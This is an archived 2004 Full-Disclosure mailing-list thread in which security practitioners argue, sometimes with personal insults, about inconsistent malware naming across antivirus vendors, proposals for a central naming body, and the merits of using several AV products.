It's up to people like us that read lists like this to make them fix this silly problem, or we can ignore it. It doesn't affect me much, it just seems silly that they cannot name things consistently. Secondly, one of the greatest impediments to ongoing (as opposed to initial, outbreak-phase) naming inconsistency is that many vendors do not have internal processes robust enough to easily handle renaming This is a lame excuse at best, maybe these companies need to redesign themselves, this should not be a big problem. (And please, before replying to this message, please, please, please, please, please read _all_ the rest of thread -- as the only person making a significant contribution who has more than half a clue about how all this stuff works, what may be technically feasible, and what a great deal of customer and industry history suggests may be acceptable, answering the same misconceptions over and over is getting tiresome...) We'll be sure to bow down to you... Todd
Re: [Full-Disclosure] (no subject)
As I explained in other of my posts in this and the related AV Naming Convention thread, in general by far the largest cost of naming disagreement is borne by the users in the early hours of large-scale outbreaks. Forget the whole naming thing...it's been bandied about before, ad nauseam, and things haven't changed. What *I* would like to see is some real analysis of what they find. Too many times, weeks after something's come out, some A/V company still has "modifies/updates some Registry keys" on their web site. Even Symantec lacks consistency with this...specifying Registry keys or file entries that affect Win9x vs NT+ in some writeups, but not in others. Some companies do a good job of specifying the footprints that malware leaves behind. However, none of the A/V vendors are really consistent with this. On a side note, it really would be nice for MS to publish specific information on when certain keys are loaded by the system...the bad guys seem to know this sort of thing, but educating sysadmins is difficult when MS doesn't provide any documentation. You know what, I don't work in the anti-virus field, but what you are saying is BS. There is no good reason that I can think of that the AV companies cannot rename these things after the fact. Why should they? One A/V company calls it one thing, and then puts the names used by other A/V companies in the aka section of their writeup. When an outbreak happens, they provide a fix and name it whatever they want. After the fact, they could rename things and their updates reflect the proper name. They can keep a reference to their name in the description, what's a few more characters in the signature files for every piece of malware going to matter? another 100k in a download at most? I agree that there is probably a lot of marketing pressure that may make this difficult, but there is no technical reason for it. Technical reasons, perhaps...but I think you hit the nail on the head...it's driven by $$, in some way. 
The AV companies cannot be that lame that they cannot handle a simple name change. I mean we use databases and other things and using these computers that should make this easy. If they are that lame, maybe they shouldn't be in business. Don't you think that's kind of harsh? After all, one could simply come back to you and say, well, if you can do better, why aren't you doing it?
RE: [Full-Disclosure] (no subject) Why not?
The Pentagon uses a solution that scans everything with multiple engines. We looked into getting it, but it is pretty costly. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Random Letters Sent: Friday, August 13, 2004 3:56 AM To: [EMAIL PROTECTED] Subject: [Full-Disclosure] (no subject) Why not? [snip: quoted in full from the Random Letters post above]
Re: [Full-Disclosure] (no subject)
Todd Burroughs wrote: Before trying to explain a few items to Todd, it is clear that he is either smoking something very bad or he jumped into the middle of thread on a topic he knows nothing about and decided the rest of the world wanted his ignorant, pea-brained opinions anyway. If Todd reads all the rest of the thread that came before this and still cannot see why his post makes him appear to be a complete moron, I'll gladly try to explain it again... I can easily understand how someone unversed in the _market forces_ pertaining to antivirus software could hold that position, and as a theoretical solution to the problem of lack of cross-vendor naming coordination it has often been suggested even by those who know it would never work in the real world. Neat and tidy as such a solution seems, it will not, however, work. As I explained in other of my posts in this and the related AV Naming Convention thread, in general by far the largest cost of naming disagreement is borne by the users in the early hours of large-scale outbreaks. Thus, a solution that specifically _requires_ all vendors to use a different name until a name is agreed (no matter what this process it will take some _additional_ time) is, by design, an _anti-solution_ as such a solution, by design, ensures perfect naming inconsistency at the time the highest cost of naming inconsistency is borne. Vendors should not have to use a different name until the real one is determined, they should use whatever they want to. Dip-stick -- that is, as I just pointed out immediately above, precisely what happens now and is (part of) the cause of the problem that is being discussed. Please read the rest of the thread then re-read the message you think you are responding to so you actually know what is being talked about and who holds what positions. You know what, I don't work in the anti-virus field, but what you are saying is BS. ... Of course you do. 
And someone with well over a decade's close association with these issues, at the bleeding edge of malware naming decisions for most of his waking hours wouldn't know what he is talking about. Just like I am not a medical doctor so I must be better qualified to sort out the medical profession... ... There is no good reason that I can think of that the AV companies cannot rename these things after the fact. ... Well, fortunately for the world, you don't get to shape the solutions here... ... When an outbreak happens, they provide a fix and name it whatever they want. ... This _IS_ what happens now. _THAT_ is part of the problem. A _LARGE_ part... ... After the fact, they could rename things and their updates reflect the proper name. ... Indeed, some can and sometimes some of them do. Of course, often 3, 6, 12, 24, 48 or even 72 hours after the event (and after processing perhaps several dozen more submissions from their users) very few folk actually care any more. Yeah, yeah, there are exceptions, but the reality is that the often massive re-architecting of internal processes in some AV companies is simply not seen as worth the effort (and therefore the cost). Thus, it _will not_ happen unless the ROI factor of making such changes as will allow nimble naming and rampant re-naming change dramatically. Exceptionally few customers have ever actually changed product loyalties because of the naming mess, so there really is no compelling business case for fixing some of the chronically stupid processes that prevent staff in some AV companies from changing names at will. Now, I did not say I like this situation and I was not defending it -- if you'd read the whole thread you would, in fact, realize I am one of the strongest critics of the current situation and am certainly the best informed about the topic amongst those posting. 
However, no matter how elegant a proposed solution is, it has to face the cold hard facts of the commercial realities, and technical realities, that will constrain its possible adoption. Thus, as much as you may not like the reasons I gave for why that proposal will not work, those reasons are some of the constraints that have prevented such ideas from already being implemented. As an outsider you cannot know this, but from watching and participating in the day-to-day workings of the AV industry for all these years now, I can tell you there hasn't yet been a vaguely original sentence in all the ideas thrown into these F-D threads on malware naming and there are established practices and reasons for why none of those ideas have been adopted and/or never will be. (This does not mean that some of the ideas might be at least half worth considering, as often the reasons for their non-acceptance are very poor, though this is NOT the case with this idea -- it's downright stupid and will never fly if the objective is to make things better.) ... They can keep a reference to
Re: [Full-Disclosure] (no subject)
Harlan Carvey wrote: Forget the whole naming thing...it's been bandied about before, ad nauseam, and things haven't changed. What *I* would like to see is some real analysis of what they find. Too many times, weeks after something's come out, some A/V company still has "modifies/updates some Registry keys" on their web site. Even Symantec lacks consistency with this...specifying Registry keys or file entries that affect Win9x vs NT+ in some writeups, but not in others. I think the whole AV naming issue is, though problematic, the least of our problems. I think you hit the nail on the head here, Harlan. How do you enforce a unified naming schema? How would you hold them accountable for following the standard and/or listening to the standard body that does the naming? There's no way to do it that I know of that wouldn't cause all kinds of problems. Not to mention the fact that in most western countries this would almost certainly be a major legal rights issue. I'm no libertarian by any stretch of the imagination, but not allowing corporations to maintain their own naming symbols is counterproductive and problematic on many levels. What I would like to see is an organization that maintains its own malware dictionary - including virii, trojan horses, worms, spyware, adware, exploits, etc... This organization would have a standardized naming procedure, and these standard names would be able to be cross-referenced with the aliases that the anti-virus companies utilize. The sole purpose of this organization would be to provide this information to whomever looks for it. It would not serve to force the AV vendors to do anything. Yes, this is similar to CVE. Yes, it would take a monumental amount of work to do. :) But, it could also be a very useful resource if created properly. I can see forums for each malware branch/variant. I can see evolving analysis trees. I can see white-paper repositories on specific malware methods and ways to keep them from doing their damage. 
I think that the solution to this is not to try to force the companies to do what they don't want to do -- that's worse than herding cats. The key is to create a meeting-ground of sorts. This is fraught with problems as well, but could be really worthwhile. Does anything like this exist at this moment? -Barry
Re: [Full-Disclosure] (no subject)
Barry, I think the whole AV naming issue is, though problematic, the least of our problems. I think you hit the nail on the head here, Harlan. One other thing I'd like to throw into the mix. This whole discussion is being viewed, it seems to me from the wrong perspective. The attitude that the entire A/V industry should have a common naming convention seems to be coming from the open source camp...while A/V companies aren't necessarily open source. Companies in general are about making money, and you do that through establishing and maintaining competitive advantages. Expending resources (ie, people, money, time, etc) on an endeavor to establish and maintain a common naming scheme is an expenditure that has very little (if any) ROI...it can't be justified to investors. How are A/V companies competitive? They identify and analyze malware, and update their products. Doing it faster and better than the next guy is the key. Slowing that process down to coordinate with other companies dissolves the advantage. Let's say I discover a piece of malware, and call a round table meeting...only to find out that none of the other members have discovered the malware yet. My advantage goes bye-bye.
Re: [Full-Disclosure] (no subject)
On Friday 13 August 2004 05:00, Brad Griffin wrote: network but located inside the dirty lab, say) they often do not _want_ to break their own concentration. I'd suggest they're not so isolated as you claim. For one thing, how do you suppose they get to hear new strains are found ? Or receive samples ? Did you take the term 'isolated' to mean locked away with no human or other contact? ...strange... Not per se. But the argument about not wanting to break concentration doesn't really fly if one is constantly interrupted by coworkers either... *virii* <g> What ? You prefer viruses ? virusses ? Viri ? Virea ? Virux ? ;-) No. It may not matter IF you only use one single brand of AV software. But that is NOT how it works in the real world. Companies tend to deploy multiple AV solutions on different layers so as to decrease the likelihood of some virus slipping through. And maybe even more importantly, Google research is done all the time, which doesn't work well if a strain goes by many different names. I am yet to come across a 'large' company or enterprise that uses separate brand av applications for desktop and server solutions. It makes economic and logistic sense to use one vendor for your av solution that is deployed at different levels (or layers if you prefer that terminology). About the only people I've seen use different antivirus products in one environment are home users or small businesses that misinterpret 'layers of defence' in an anti-virus context to mean 'different brands of defence'. Considering that many major av co's products are cross platform nowadays, I doubt many companies will continue using separate brand products in a mixed OS environment for much longer either. Well, whoever said 'large' companies are the only ones that matter? In my experience having multiple brands happens often. In some cases they may deploy a filtering mail gateway that's bundled with a brand X virus scanner. 
In other cases they may find that brand Y on the desktop offers better value than using brand Z which they equipped their exchange server with... In any case, deploying multiple brands IS a good practice, security-wise. If a buffer overflow (or a botched Datfile update) is found in one product it will probably affect their whole line of products. That's bad. Then let's consider the various timezones; using european and US AV products can sometimes give you the few hours advance that you need to avoid a disaster. If you want 4 locks on your front door, would you buy four locks of the same brand ? (or even, for paranoid people like me: would you have them all installed by the same guy ?) For me, the answer would be a resounding NO. I can't understand how the Google research is a problem with naming conventions. Google for a virus name and multiple hits come up, mostly for descriptions on a/v sites that also carry the alias names in most cases. Yes they do. But I hardly think it is LESS work for them to track all those aka names and versions to include in their description pages than it would be to standardize after the fact on one single name for the virus. Right ? My take is that so long as anti-virus developers are managing to keep their reactive model of virus detection and removal almost up to speed with the release of new malware, I don't really care if they name the next virus George or Mildred, so long as their software will identify and remove it from a system. Well, precisely. You hit the nail on the head... It happened on SO many occasions to me that the installed AV scanner did identify the virus but was unable to remove it (or it instantly came back after removal) that I had to hunt down a different (better) removal tool (rescue-CD, dedicated removal tool, or otherwise). It is at those moments that all the aliases in use for the virus bite you. Maarten -- Yes of course I'm sure it's the red cable. 
I guarante[^%!/+)F#0c|'NO CARRIER
RE: [Full-Disclosure] (no subject)
It is a very complex issue...but a simple agreement on standard post/pre-fixes would be a start. As my original post stated, I wouldn't leave it up to the AV companies at all. Have a separate entity (group of people like us), gain the backing of big companies and other entities and come up with some standards. If AV vendors choose to work with these unset rules then they are approved by the entity. People that believe in a standardization will only use entity approved products. Let the customers decide if this is what they want. But we have to give them a way to start voicing the need. -Original Message- From: Barry Fitzgerald [mailto:[EMAIL PROTECTED] Sent: Friday, August 13, 2004 12:02 PM To: Todd Towles Cc: Harlan Carvey; [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] (no subject) Todd Towles wrote: How does naming a virus with @mm or a W32 in the front slow the process down? Naming has nothing to do with AV vendors making money IMO. If it does, McAfee should change its name to Norton before it tries to buy it out. =) It doesn't have a direct impact -- however, you're not going to get the major companies to agree to put resources towards collaboration and changing names. That's a used resource which cuts into their profits. (Note: I'm trying to take this from their perspective, not mine.) It's a little more complex than just having prefixes and postfixes. Actually, if you look at the latest e-mail worms and their variance in variant naming between AV vendors, it's a lot more complex than standardized prefixes and whatnot. Not to mention the fact that many businesses won't do so as a matter of ego/self-reliance. -Barry
RE: [Full-Disclosure] (no subject)
How does naming a virus with @mm or a W32 in the front slow the process down? Naming has nothing to do with AV vendors making money IMO. If it does, McAfee should change its name to Norton before it tries to buy it out. =) -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Harlan Carvey Sent: Friday, August 13, 2004 9:40 AM To: [EMAIL PROTECTED] Cc: Barry Fitzgerald Subject: Re: [Full-Disclosure] (no subject) [snip: quoted in full from Harlan Carvey's post above]
Re: [Full-Disclosure] (no subject)
Howdy Harlan, On Fri, 2004-08-13 at 09:40, Harlan Carvey wrote: The attitude that the entire A/V industry should have a common naming convention seems to be coming from the open source camp...while A/V companies aren't necessarily open source. Companies in general are about making money, and you do that through establishing and maintaining competitive advantages. What gave you the idea that this discussion started from an open source camp? But you are right in regards to the goals of the A/V companies. I think a lot of folks in this thread made it blatantly clear that A/V companies do not care about their clients or client satisfaction, they just care about their bottom line. Let's leave it at that and move on. How are A/V companies competitive? They identify and analyze malware, and update their products. Doing it faster and better than the next guy is the key. Slowing that process down to coordinate with other companies dissolves the advantage. Let's say I discover a piece of malware, and call a round table meeting...only to find out that none of the other members have discovered the malware yet. My advantage goes bye-bye. Nope, doesn't have to be. There doesn't need to be information sharing. I wouldn't even make it a round table meeting. At the risk of being ridiculed again by Nick or others, let's entertain this idea. Remove the round table and replace it with a public (or industry) bell. If an A/V company (commercial or not) finds a new virus, it rings the bell. First to ring the bell sets a name. Other companies publish with their own name *candidates* and if it turns out to be the same virus, adopt the name of the company ringing the bell. Renaming a virus on a web site and in a database and signature set a few hours later shouldn't be hard to do. But what do I know about the A/V industry anyway... I'm just making silly suggestions. No information sharing needs to take place, and competitive advantage remains. 
All it takes is an industry agreement to work this way. I think it will benefit their clients greatly. In closing, the A/V industry has done a good job with naming viruses in the past. However, in recent years the surge of worms has quickened the reaction of the industry. They now respond in hours, dare I say minutes, because the worm/virus/malware is spreading faster than it did before. This haste or rush to market is what caused the names to differ between vendors. And I think that through a sensible agreement, heck make it a handshake agreement, the industry can return to better more coherent naming of viruses. Regards, Frank
Re: [Full-Disclosure] (no subject)
On Fri, 13 Aug 2004 18:06:06 +0200, Maarten [EMAIL PROTECTED] wrote:
> On Friday 13 August 2004 05:00, Brad Griffin wrote:
> > *virii* <g>
>
> What ? You prefer viruses ? virusses ? Viri ? Virea ? Virux ? ;-)

This might be getting a touch off-topic (or at least definitely a tangent), but "virii" is not a word. "Viruses" is the correct term.

http://spl.haxial.net/viruses.html
http://www.nationmaster.com/encyclopedia/Plural-of-virus

There's more, Google around (try "virii virus language" or some such set of terms).

--
Kyle Maxwell
[EMAIL PROTECTED]
Re: [Full-Disclosure] (no subject)
Harlan Carvey wrote:
> Barry,
>
> One other thing I'd like to throw into the mix. This whole discussion is being viewed, it seems to me, from the wrong perspective. The attitude that the entire A/V industry should have a common naming convention seems to be coming from the open source camp...while A/V companies aren't necessarily open source. Companies in general are about making money, and you do that through establishing and maintaining competitive advantages. Expending resources (i.e., people, money, time, etc.) on an endeavor to establish and maintain a common naming scheme is an expenditure that has very little (if any) ROI...it can't be justified to investors.

Agreed in general - though I'm not sure if it's an open source issue specifically... I've known many Free Software/Open Source people who are opposed to being held to standards bodies and closed source people who are absolutely sticky about adherence to standards. Both perspectives have their downsides.

Nonetheless, that's a nitpicking issue -- your primary point is absolutely correct: You can't enforce it; They don't want to do it (and I'm inclined to think they probably shouldn't want to do it -- it's sort of like telling someone that they have to name their kid a certain way so that others can pronounce their name); the problem must be solved some other way.

> How are A/V companies competitive? They identify and analyze malware, and update their products. Doing it faster and better than the next guy is the key. Slowing that process down to coordinate with other companies dissolves the advantage. Let's say I discover a piece of malware, and call a round table meeting...only to find out that none of the other members have discovered the malware yet. My advantage goes bye-bye.

I think that the problem is being looked at as an industry policing issue when it's really an informational issue. By this I mean that the issue is in how the information on said malware is distributed and digested by the masses.

If there were a central information repository to go to for all of the advisories and for a combined write-up, it'd reduce some of the confusion. It wouldn't cost the AV vendors a thing because it would be a separate organization. The trick would be funding. Starting a small site is one thing, but a site of this magnitude would have to be funded somehow. Ad revenue probably wouldn't be enough for the bandwidth/equipment/man-hours to put something like this together...

-Barry
RE: [Full-Disclosure] (no subject)
That is the question we need to find out. But only by starting it will we ever know. Agreed?

-----Original Message-----
From: Barry Fitzgerald [mailto:[EMAIL PROTECTED]
Sent: Friday, August 13, 2004 12:11 PM
To: Todd Towles
Cc: Mailing List - Full-Disclosure
Subject: Re: [Full-Disclosure] (no subject)

Todd Towles wrote:
> As my original post started, I wouldn't leave it up to the AV companies at all. Have a separate entity (group of people like us), gain the backing of big companies and other entities and come up with some standards.

You don't even need big companies to approve or back you -- you just need a website and the time to put into it. It's a real need so then advertise and let the market take over. Get some community involvement. Start with things that will draw people in.

The market is like gravity -- trying to force it to do something is almost impossible if you're small. What you want to do is grow your project until it can reach the critical mass where it can't be ignored. Then you use your influence to affect change.

How serious are people with regard to fixing this problem? Would people put some time into a community run site that had the goal of becoming an organization pointed towards becoming a primary depot of security information?

-Barry
Re: [Full-Disclosure] (no subject) (try using a friggin subject line...)
Insert subject here ^

-KF
Re: [Full-Disclosure] (no subject)
First off: Nick, please lose that damn attitude of yours !

Further, by hammering on the endless we-have-done-it-for-many-years-so-who-are-you-to-tell-us-differently part you're actually making yourself part of the problem, not part of the solution. You're saying that internal procedures make it so difficult to adapt names after the fact. When in fact the strength of a company, any company, IS to be able to adapt to changing circumstances. And if they're not able to, eventually they will go the way of the dinosaurs.

The only thing Todd (and I) are trying to say is that it is possible to rename after the fact. I don't #!%$* care how many old Cobol programs need adapting for that to get possible, but the fact remains that it IS. Don't start again about how your current procedures may prevent or complicate that. Worse integration problems, by far more complex and bigger companies or conglomerates are being tackled every day. Yeah. To name a few ? How about mergers, or international intelligence-exchange between law enforcement agencies. Do you think that they let anyone stop them by complaining that database format X isn't readily compatible with format Y ? No. They fix it, they make it work together no matter what. So don't start about how impossible it is for you to rename one simple entry.

To conclude, I'd like to put serious question marks by your statement that the first few hours are the all-important ones. First off, by renaming after the fact (after the first few hours/days/weeks) no-one is changing ANYTHING about those first hours so you shouldn't have ANY complaint regarding that. Secondly, a lot of the confusion only comes later. The guys that have their AV software up and running and current mostly do not suffer from the outbreaks. The problem often comes (much) later, with the people who didn't update, 'forgot to', or plain disregard any security or updates whatsoever. And then you are only called in to fix things when stuff is really breaking down. Or are you saying you've never been asked to de-toxify your parents'-, friends'- or siblings'- computers that got infested despite everything ? Everyone has.

Oh and P.S.: Yes, I did read all of the threads pertaining to this.

Maarten

On Friday 13 August 2004 15:08, Nick FitzGerald wrote:
> Todd Burroughs wrote:
>
> Before trying to explain a few items to Todd, it is clear that he is either smoking something very bad or he jumped into the middle of thread on a topic he knows nothing about and decided the rest of the world wanted his ignorant, pea-brained opinions anyway. If Todd reads all the rest of the thread that came before this and still cannot see why his post makes him appear to be a complete moron, I'll gladly try to explain it again...
>
> > > I can easily understand how someone unversed in the _market forces_ pertaining to antivirus software could hold that position, and as a theoretical solution to the problem of lack of cross-vendor naming coordination it has often been suggested even by those who know it would never work in the real world. Neat and tidy as such a solution seems, it will not, however, work. As I explained in other of my posts in this and the related "AV Naming Convention" thread, in general by far the largest cost of naming disagreement is borne by the users in the early hours of large-scale outbreaks. Thus, a solution that specifically _requires_ all vendors to use a different name until a name is agreed (no matter what this process is, it will take some _additional_ time) is, by design, an _anti-solution_ as such a solution, by design, ensures perfect naming inconsistency at the time the highest cost of naming inconsistency is borne.
> >
> > Vendors should not have to use a different name until the real one is determined, they should use whatever they want to.
>
> Dip-stick -- that is, as I just pointed out immediately above, precisely what happens now and is (part of) the cause of the problem that is being discussed. Please read the rest of the thread then re-read the message you think you are responding to so you actually know what is being talked about and who holds what positions.
>
> > You know what, I don't work in the anti-virus field, but what you are saying is BS. ...
>
> Of course you do. And someone with well over a decade's close association with these issues, at the bleeding edge of malware naming decisions for most of his waking hours wouldn't know what he is talking about. Just like I am not a medical doctor so I must be better qualified to sort out the medical profession...
>
> > ... There is no good reason that I can think of that the AV companies cannot rename these things after the fact. ...
>
> Well, fortunately for the world, you don't get to shape the solutions here...
>
> > ... When an outbreak happens, they provide a fix and name it whatever they want. ...
>
> This _IS_ what happens now. _THAT_ is
Re: [Full-Disclosure] (no subject)
Todd Towles wrote:
> How does naming a virus with @mm or a W32 in the front slow the process down? Naming has nothing to do with AV vendors making money IMO. If it does, McAfee should change its name to Norton before it tries to buy it out. =)

It doesn't have a direct impact -- however, you're not going to get the major companies to agree to put resources towards collaboration and changing names. That's a used resource which cuts into their profits. (Note: I'm trying to take this from their perspective, not mine.)

It's a little more complex than just having prefixes and postfixes. Actually, if you look at the latest e-mail worms and their variance in variant naming between AV vendors, it's a lot more complex than standardized prefixes and whatnot. Not to mention the fact that many businesses won't do so as a matter of ego/self-reliance.

-Barry
Re: [Full-Disclosure] (no subject)
Todd Towles wrote:
> As my original post started, I wouldn't leave it up to the AV companies at all. Have a separate entity (group of people like us), gain the backing of big companies and other entities and come up with some standards.

You don't even need big companies to approve or back you -- you just need a website and the time to put into it. It's a real need so then advertise and let the market take over. Get some community involvement. Start with things that will draw people in.

The market is like gravity -- trying to force it to do something is almost impossible if you're small. What you want to do is grow your project until it can reach the critical mass where it can't be ignored. Then you use your influence to affect change.

How serious are people with regard to fixing this problem? Would people put some time into a community run site that had the goal of becoming an organization pointed towards becoming a primary depot of security information?

-Barry
Re: [Full-Disclosure] (no subject)
On Fri, 13 Aug 2004 21:17:44 +0200, Maarten said:
> The only thing Todd (and I) are trying to say is that it is possible to rename after the fact. I don't #!%$* care how many old Cobol programs need adapting for that to get possible, but the fact remains that it IS.

The question is *in fact* what ROI the companies get for modifying all that old Cobol. Possible and worth doing are two different things...

> Don't start again about how your current procedures may prevent or complicate that. Worse integration problems, by far more complex and bigger companies or conglomerates are being tackled every day. Yeah. To name a few ?

Note that here the ROI is pretty easy - you fix the compatibility or the company goes under.

> How about mergers, or international intelligence-exchange between law enforcement agencies. Do you think that they let anyone stop them by complaining that database format X isn't readily compatible with format Y ? No. They fix it, they make it work together no matter what.

Actually, that isn't always the case. http://www.publicintegrity.org/report.aspx?aid=332&sid=100 Yes, a database so borked that copying it could break it.

> So don't start about how impossible it is for you to rename one simple entry.

It's not a question of being *impossible*. But if it costs them US$750K to do it, and the expected return is under US$750K, why should they do it?

Hell, we're talking about an industry which as a whole *continues* to keep spewing out 'We removed a virus/worm' warnings to known not-at-fault addresses - presumably the (probably very low) cost of ceasing to do so is counterbalanced by the advertising benefit of the spam. If they won't do *THAT* little thing that's *obviously* in the public interest, why should they change the way they name stuff, at probably higher cost, and less obvious benefit?
Re: [Full-Disclosure] (no subject)
On Saturday 14 August 2004 02:52, [EMAIL PROTECTED] wrote:
> On Fri, 13 Aug 2004 21:17:44 +0200, Maarten said:
> > The only thing Todd (and I) are trying to say is that it is possible to rename after the fact. I don't #!%$* care how many old Cobol programs need adapting for that to get possible, but the fact remains that it IS.
>
> The question is *in fact* what ROI the companies get for modifying all that old Cobol. Possible and worth doing are two different things...

Oh definitely. I do not contest that. But these posts saying "not possible" from a technical / logistical standpoint started to irritate me... But sure, until there is an economic reason for change, there won't be.

> > How about mergers, or international intelligence-exchange between law enforcement agencies. Do you think that they let anyone stop them by complaining that database format X isn't readily compatible with format Y ? No. They fix it, they make it work together no matter what.
>
> Actually, that isn't always the case. http://www.publicintegrity.org/report.aspx?aid=332&sid=100 Yes, a database so borked that copying it could break it.

Hahaha. Great link, thanks... Although this may happen, it sounds to me like a political issue rather than a technical one. When you can retrieve data you can copy it (by however [inefficient] means is irrelevant now).

> Hell, we're talking about an industry which as a whole *continues* to keep spewing out 'We removed a virus/worm' warnings to known not-at-fault addresses - presumably the (probably very low) cost of ceasing to do so is counterbalanced by the advertising benefit of the spam. If they won't do *THAT* little thing that's *obviously* in the public interest, why should they change the way they name stuff, at probably higher cost, and less obvious benefit?

Hear hear...! Good point.

Maarten

--
Yes of course I'm sure it's the red cable. I guarante[^%!/+)F#0c|'NO CARRIER
RE: [Full-Disclosure] (no subject) Why not?
If it is of interest, GFI (www.gfi.com) mail download security packages offer multiple virus engine scanning (NAI, Kaspersky, BitDefender and something else), within one product. Not really that expensive, and seems to work well enough.

Regards
Richard

-----Original Message-----
From: [EMAIL PROTECTED] on behalf of Todd Towles
Sent: Fri 13/08/2004 13:33
To: Random Letters; [EMAIL PROTECTED]
Cc:
Subject: RE: [Full-Disclosure] (no subject) Why not?

The Pentagon uses a solution that scans everything with multi-engines. We looked into getting it, but it is pretty costly.

-----Original Message-----
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Random Letters
Sent: Friday, August 13, 2004 3:56 AM
To: [EMAIL PROTECTED]
Subject: [Full-Disclosure] (no subject) Why not?

Brad Griffin wrote:
> I am yet to come across a 'large' company or enterprise that uses separate brand av applications for desktop and server solutions. It makes economic and logistic sense to use one vendor for your av solution that is deployed at different levels (or layers if you prefer that terminology). About the only people I've seen use different antivirus products in one environment are home users or small businesses that misinterpret 'layers of defence' in an anti-virus context to mean 'different brands of defence'. Considering that many major av co's products are cross platform nowadays, I doubt many companies will continue using separate brand products in a mixed OS environment for much longer either.

Reply:

The last two companies I have worked for, one a Fortune 500 company, the other a smallish science company, both use multiple products. One uses Symantec on the Windows servers and McAfee on the Windows workstations and Clam on the Linux servers and workstations. The other uses Clam on its Linux servers and Panda on its Windows servers and workstations. Of course, that hasn't completely stopped virus outbreaks, just because there's no way that new definitions can be rolled out quickly enough.

As you might expect, Windows laptops were the main culprits. But I have seen Linux viruses and breakins as well as Windows hacks too. And please don't say that the IT wasn't doing its job. As long as you have an internet presence you are a target, and none of the products are 100% secure ... Cisco anyone?

So there you go. My two Euros worth.

Does anyone remember the AV scanner that came with MS-DOS6? Haha

---
Does HoTMaiL come with a spell checker?
---
Re: [Full-Disclosure] (no subject)
On Tuesday 10 August 2004 07:19, Nick FitzGerald wrote:
> The appropriately-named Frank Knobbe wrote:
> > Isn't the complete lack of naming standardization in the AV industry simply amazing?
>
> ...
>
> However, if all AV vendors (and it would have to be all vendors or market forces would prevent it happening, so guess what is one of the largest things blocking better naming coordination?) were to agree a name perfectly before _any_ of them shipped updated detection for new viruses, it is a better than fair bet that those same outsiders would then be the ones complaining longest and loudest about how tardy AV vendors were at shipping emergency updates.

There is nothing stopping AV vendors from naming freshly discovered virii with an internal naming scheme (VENDOR-MMDDHHxy) pending a central database / organisation to name the virus. Then all vendors can rename the new strain from their generic temporary name to the definitive name. This is trivial, they update virus definitions all the time, why not also update the name.

This could even be good for competition; the central authority could give credit to the first discoverer by naming the virus after the vendor who first found it (but I digress here). In the real world, things are very often named after their discoverers or inventors. Star systems, diseases, laws, etcetera.

Of course, the first thing is to form that central authority, but then again lots of industries have a central authority -whether decreed by law or not- so it's not something deemed impossible. At least there are no technical barriers to stop that, only political ones. Despite the high rate of development as you outline below. Using a temporary name is quite simple to do, simple to update and overall better for everyone.

Maarten

> ...
>
> > Imagine that were the case in science, particular medicine...
>
> Or perhaps it would be better to imagine that you made a more meaningful analogy, such as asking how well you think medicine would do in maintaining naming consistency if entirely new strains and variants of viruses and pathological bacteria appeared world-wide at the rate computer malware proliferates. A little exercise of the grey cells will likely suggest that they are unlikely to do better in the short term (i.e. during the outbreak phase), but would probably do much better longer-term as the diseases, outbreaks and treatments of biological malware tend to last _MUCH_ longer than their computer cousins.
>
> If there was much ongoing need to coordinate names I think the AV industry would do better than it does now, but with the rate at which new variants appear being what it is, medium-term renaming and name coordination are both problematic and (generally) seen as having very little, if any, market value, so few people expend much effort on such renaming.

--
Yes of course I'm sure it's the red cable. I guarante[^%!/+)F#0c|'NO CARRIER
Re: [Full-Disclosure] (no subject)
On Wednesday 11 August 2004 02:48, Nick FitzGerald wrote:
> Frank Knobbe to Valdis Kletnieks:
> > Obviously not at time of research. But these days everyone is keeping an ear on the ground... I mean Internet... while they are doing research.
>
> Actually, no. Much AV research and analysis takes place in physically isolated labs (for hopefully obvious reasons such as not contributing further to the outbreak and ensuring the lab systems are in known states). The analysts typically need relatively quiet surroundings to allow them to concentrate closely on what they are doing so as, for example, to bypass the various anti-debugging and other tricks used in much malware specifically to slow its analysis and thus increase its initial spread time. Folk working in such environments commonly have no access to their Email, the web or other normal desktop resources (IM, corporate IT systems, etc) -- they are networkologically isolated for a reason, remember. Also, even if they do have access to such resources (clean and dirty networks that are never allowed to mix by careful network planning and lack of removable media in the workstations on the clean network but located inside the dirty lab, say) they often do not _want_ to break their own concentration.

I'd suggest they're not so isolated as you claim. For one thing, how do you suppose they get to hear new strains are found ? Or receive samples ? So effectively, there is a layer between them and the internet that does communicate (it doesn't really matter whether that layer is social or technological). And the analysts aren't the people naming the virii anyhow, that's probably some entirely other part of the AV company.

> Well, one large vendor in particular is especially notorious for not renaming malware, at least once it has released a non-beta DEF update that includes a new family name or a variant ascription. This is not peculiar to that particular developer, but is a heavily entrenched practice due in no small part to an incredibly brain-dead infrastructure underlying much of the non-detection collateral that follows addition of a virus detection to their DEF files. Great scads of support material, web descriptions and all manner of other stuff that users really like are significantly based on the _name_ the scanning engine reports when detecting a piece of malware, so once that company goes public with a name it has an enormous amount of baggage tied very closely to the name. This is, of course, entirely bad and stupid design. In fact, I'd argue it is a classic case of an abject lack of any informed design process at all, as it ties far too much ephemeral stuff (regardless of how useful/desirable to the user) to what anyone with half a clue about antivirus processes knows in the core of their being is an _entirely arbitrary and highly volatile_ identifier -- the chosen malware name...

What's this ? AV vendors can't work with variable substitution ??

    # $thisvirus = vendor-200408121403
    $thisvirus = MyDoom-AV

> > I'm still confused if MyDoom-O and MyDoom-M are the same thing or not.
>
> Well, they darn well should be different. Only one scan engine uses the (non-standard) -variant form so it should be the case that detections of -M and -O variants of the same family are, in fact, detections of two truly different variants. Of course, what Sophos calls MyDoom-M may well be called MyDoom.O by some other scanner(s) for one or more of the reasons likely to emerge from the situations already described above, but that is a different matter.

No. It may not matter IF you only use one single brand of AV software. But that is NOT how it works in the real world. Companies tend to deploy multiple AV solutions on different layers so as to decrease the likelihood of some virus slipping through. And maybe even more importantly, Google research is done all the time, which doesn't work well if a strain goes by many different names.

> > BTW: Perhaps the analogy to medicine was misplaced. I just thought in terms of diseases. How many different names do we have for ...say... chicken pox or colitis or diabetes? Imagine you had 5 different names for the flu. I could come up with a dozen Monty Python sketches taking place in the doctor's office
>
> A yes, but so long as the doctor has the machine that goes BING everything will be OK...

You're missing the point. Every doctor addresses the type II diabetes as being the type II diabetes. There is no confusion whatsoever here.

